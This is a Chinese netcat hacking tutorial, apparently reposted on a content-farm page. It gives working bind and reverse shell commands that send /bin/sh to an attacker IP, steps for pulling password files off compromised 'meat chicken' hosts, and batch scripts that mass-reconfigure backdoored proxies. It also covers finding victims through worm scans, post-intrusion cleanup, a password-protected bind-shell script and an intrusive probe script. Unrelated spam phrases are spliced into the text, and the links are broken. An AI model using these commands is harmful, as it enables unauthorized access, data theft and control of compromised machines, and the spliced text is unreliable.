3.1.端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open
3.2.扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
这样扫描会留下大量的痕迹,系统管理员会额外小心
3.3. 后门
victim machine: //受害者的机器
nc -l -p port - //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻击者的机器.
nc ip -p port //连接victim_IP,然后得到一个shell。
3.4.反向连接
attacker machine: //一般是,远程溢出,攻击.
//或者wollf的反向连接.
nc -vv -l -p port
victim machine:
nc - attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker_ip port1 | | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
139要加参数-s(nc.exe -L -p 139 -d - -s 对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。
3.5.传送文件:
3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来.
nc -d -l -p port < path\filedest /*attacker machine*/ 可以shell执行
nc -vv attacker_ip port > /*victim machine*/ 需要Ctrl+C退出
/
/肉鸡需要gui界面的里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.
3.5.2 attacker machine --> victim machine //上传命令文件到肉鸡
nc -vv -l -p port > /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < path\filedest /*attacker machine*/ 可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
结论: 可以传输ascii,bin文件.可以传输程序文件.
问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .
或者只有再次连接使用 杀掉进程.但是是否释放传输文件打开的句柄了?
3.6 端口数据抓包.
nc -vv -w 2 - [url]www.xfocus[/url] 80 21-15
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a #
< 00000084 83 00 00 01 8f # .....
3.7 telnet,自动批处理。 ★★★★★我要重点推荐的东西就是这个.
nc victim_ip port < d /*victim machine*/ 显示执行过程.
nc -vv victim_ip port < d /*victim machine*/ 显示执行过程.
nc -d victim_ip port < d 安静模式.
_______________d________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
< -config port 11111
net start sksockserver
exit
_______________d__END___________________
>>>>>>>>####
>>>>>#
4. 管理肉鸡,更改肉鸡设置
>>>>>>>>>>>>>>
4.1 比如要统一更改肉鸡上面的代理端口. 修改为11111 服务名称"sksockserver"
使用winshell后门. 端口1234 密码password
命令格式就是
modi.
___________modi.bat____________________________
@if "%1"=="" echo Error: &&goto END
:start
@echo password &d
@echo s >&d
@echo cd /d %%windir%%\system32\ >&d
@net stop "sksockserver" >&d
@ -config port 11111 >&d
@net start "sksockserver" >&d
@exit >&d
:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
:END
___________modi.bat__END_______________________
4.2
@echo off
三峡文言文color f0
:start
cls
C:\nc -vv -w 3 -l -p 80>&
goto start
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多
是三条一组--妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.
但是也是一种便宜的办法.
肉鸡特征:
1。unicode漏洞
2。guest密码为空,administrators组用户
3。其他漏洞
自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将改名。然后用pskill干掉进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器
>>>>>>>>>>>>>>
5. 下载连接
>>>>>>>>>>>>>>
5.1 [url]www.atstake/research/tools/network_utilities/[/url]
Tool: Netcat 1.10 for Unix
Version: 03.20.96
Platforms: *nix
Tool: Netcat 1.1 for Win 95/98/NT/2000
Version: 02.08.98
Platforms: Runs on Win 95/98/NT/2000
5.2 [url]www.xfocus/download.php?id=320[/url]
名称: cryptcat_nt.zip 更新时间: 2002-04-05
类别: 网络工具 平台: Win9x/NT/2000 大小: 115.8K 提交: maxilaw
简介: 加密传输的nc。
5.3 [url]content.443.ch/pub/security/blackhat/Networking/nc/[/url] 国外的网站
10.03.02 15:48
10.03.02 15:48 245760 cryptcat_linux2.tar
10.03.02 15:48 118533 cryptcat_nt.zip
5.4 [url]wwwxhacker/download/soft/36.htm[/url]
>>>>>>>>>>>>>>
38妇女节朋友圈文案6. 补充
>>>>>>>>>>>>>>
以下为NetCat的Unix版本使用方法(转载):
--------------------------------------
nc使用技巧
by quack<[email]quack@21cn[/email]>
[url][/url] 安全焦点
nc这个小玩意儿应该大家耳熟能详,也用了N年了吧……这里不多讲废话,结合一些script说说它的使用技巧。
(文中所举的script都
来自于的文件包)
hanoi_spc 2005-8-1 09:54
一、基本使用
Quack# nc -h
[v1.10]
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-
i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
其中端口号可以指定一个或者用lo-hi式的指定范围。
二、用于传输文件——ncp
#! /bin/sh
## 类似于rcp,但是是用netcat在高端口做的
## 在接收文件的机器上做"ncp targetfile"
## 在发送文件的机器上做"ncp sourcefile receivinghost"
## 如果调用了 "nzp" ,会将传输文件压缩
## 这里定义你想使用的端口,可以自由选择
MYPORT=23456
## 如果nc没有在系统路径中的话,要把下面一行注释去掉,加以修改
# PATH=${HOME}:${PATH} ; export PATH
## 下面这几行检查参数输入情况
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed 's+.*/++'`
test "$me" = "nzp" && echo '[compressed mode]'
# if second arg, it's a host to send an [extant] file to.
if test "$2" ; then
test ! -f "$1" && echo "can't find $1" && exit 1
if test "$me" = "nzp" ; then
compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
else
nc -v -w 2 $2 $MYPORT < "$1" && exit 0
fi
echo "transfer FAILED!"
exit 1
fi
# 是否在接收文件机器当前目录有同名文件
if test -f "$1" ; then
echo -n "Overwrite $1? "
read aa
test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
# 注意这里nc的用法,结合了重定向符号和管道
nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1
这样的话,我只要在A机器上先 QuackA# ncp ../abcd
listening on [any] 23456 ...
然后在另一台机器B上
QuackB#ncp abcd 192.168.0.2
quackb [192.168.0.1] 23456 (?)
A机上出现
open connect to [192.168.0.2] from quackb [192.168.0.1] 1027
#
查看一下,文件传输完毕。
三、用于绑定端口——bsh
首先要清楚,如果你编译netcat时仅用如make freebsd之类的命令来编译的话,这个工
具是无法利用的——要define一个GAPING_SECURITY_HOLE它才会提供-e选项
。
#! /bin/sh
## 一个利用nc的绑定shell并且带有密码保护的脚本
## 带有一个参数,即端口号
NC=nc
case "$1" in
?* )
LPN="$1"
export LPN
sleep 1
#注意这里nc的用法,参数-l是lister,-e是执行重定向
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &
echo "launched on port $LPN"
馆陶美食exit 0
;;
esac
# here we play inetd
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &
while read qq ; do
case "$qq" in
# 这里就是弱密码保护了,密码是quack
quack )
cd /
exec csh -i
;;
esac
done
要看看它是怎么使用的么?
quack# ./bsh 6666 <-------输入,后面是程序输出
-l -p 6666 -e ./bsh
launched on port 6666
quack#
quack## nc localhost 6666 <----------输入
-l -p 6666 -e ./bsh
quack <----------输入,密码验证
Warning: imported path contains relative components
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
Cracker#
四、 用于端口扫描——probe
在我们常见的一些端口扫描程序中,如Vetescan这类以shell script写成的话,很多都
需要系统中装有netcat,原因何在呢?看看下面的script,你或许会明白一些。
#! /bin/sh
## launch a whole buncha shit at yon victim in no particular order; capture
## stderr+stdout in one place. Run as root for rservice and low -p to work.
## Fairly thorough example of using netcat to collect a lot of host info.
守卫剑阁秘籍>踏青的季节到了## Will set off every intrusion alarm in existence on a paranoid machine!
# 该目录里有一些小工具
DDIR=../data
# 指定网关
GATE=192.157.69.11
# might conceivably wanna change this for different run styles
UCMD='nc -v -w 8'
test ! "$1" && echo Needs victim arg && exit 1
echo '' | $UCMD -w 9 -r "$1" 13 79 6667 2>&1
echo '0' | $UCMD "$1" 79 2>&1
# if LSRR was passed thru, should get refusal here:
# 要注意这里的用法,其实nc的这些参数掌握好可以做很多事情
$UCMD -z -r -g $GATE "$1" 6473 2>&1
$UCMD -r -z "$1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2>&1
# -s `hostname` may be wrong for some multihomed machines钱塘江罕见鱼鳞潮
echo 'UDP echoecho!' | nc -u -p 7 -s `hostname` -w 3 "$1" 7 19 2>&1
echo '113,10158' | $UCMD -p 10158 "$1" 113 2>&1
rservice bin bin | $UCMD -p 1019 "$1" shell 2>&1
echo QUIT | $UCMD -w 8 -r "$1" 25 158 159 119 110 109 1109 142-144 220 23 2>&1
# newline after any telnet trash
echo ''
echo PASV | $UCMD -r "$1" 21 2>&1
echo 'GET /' | $UCMD -w 10 "$1" 80 81 210 70 2>&1
# sometimes contains useful directory info:
# 知道是什么文件么?;)
echo 'GET /' | $UCMD -w 10 "$1" 80 2>&1
# now the big red lights go on
# 利用小工具rservice来尝试,该工具可以在的data目录里到
rservice bin bin 9600/9600 | $UCMD -p 1020 "$1" login 2>&1
rservice root root | $UCMD -r "$1" exec 2>&1
echo 'BEGIN big udp -- everything may look "open" if packet-filtered'
data -g < ${D
DIR}/nfs-0.d | $UCMD -i 1 -u "$1" 2049 | od -x 2>&1
# no wait-time, uses RTT hack
nc -v -z -u -r "$1" 111 66-70 88 53 87 161-164 121-123 213 49 2>&1
nc -v -z -u -r "$1" 137-140 694-712 747-770 175-180 2103 510-530 2>&1
echo 'END big udp'
$UCMD -r -z "$1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2>&1
# Use our identd-sniffer!
iscan "$1" 21 25 79 80 111 53 6667 6000 2049 119 2>&1
# this gets pretty intrusive, but what the fuck. Probe for portmap first
if nc -w 5 -z -u "$1" 111 ; then
showmount -e "$1" 2>&1 #象showmount和rpcinfo的使用,可能会被逮到;)
rpcinfo -p "$1" 2>&1
fi
exit 0
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
文件详解
« 上一篇
热门文章
-
八年级语文下册适合讲公开课的
2024-09-26 -
论三合化局及土局
2024-09-26 -
《生于忧患死于安乐》注释、文言现象、翻译、简答及答案
2024-09-26 -
“禹敷土”本义考辨及对大禹治水事迹的重新认识
2024-09-26 -
元好问《摸鱼儿雁丘词》的译文及阅读答案及赏析
2024-09-26 -
文言文阅读《孟子》题目及答案
2024-09-26 -
土力学期末试题和答案
2024-09-26 -
《老子四章》《五石之瓠》教案
2024-09-26 -
2020高考语文备考-文言虚词且、为、焉、也、以专题解析
2024-09-26 -
九尺之台起于累土
2024-09-26 -
乡土中国读书笔记(精选87篇)
2024-09-26 -
整本书阅读:《乡土中国》语言运用题(含答案)
2024-09-26 -
土的抗剪强度-粘聚力和内摩擦角
2024-09-26 -
【初中现代文】《乡村的泥土》阅读答案
2024-09-26 -
《乡土中国》论述类文本阅读理解及答案
2024-09-26 -
高考语文一轮总复习 现代文阅读 第二章 专题二 第四节 品味语言艺术...
2024-09-26 -
课时作业4:第6课 《老子》四章 五石之瓠
2024-09-26 -
字面意思和本意不一样的成语
2024-09-26 -
费孝通《乡土中国》阅读理解
2024-09-26 -
《乡土中国》读书心得15篇
2024-09-26
最新文章
-
字谜语大全及答案(精选310个)
2024-09-26 -
关于字谜一家十一口打一字答案是什么
2024-09-26 -
有意思的字谜
2024-09-26 -
建国方略“打一字”
2024-09-26 -
七日“打一字”
2024-09-26 -
一家有七口,种田种一亩,自己吃不够,还养一条狗“打一字”
2024-09-26
发表评论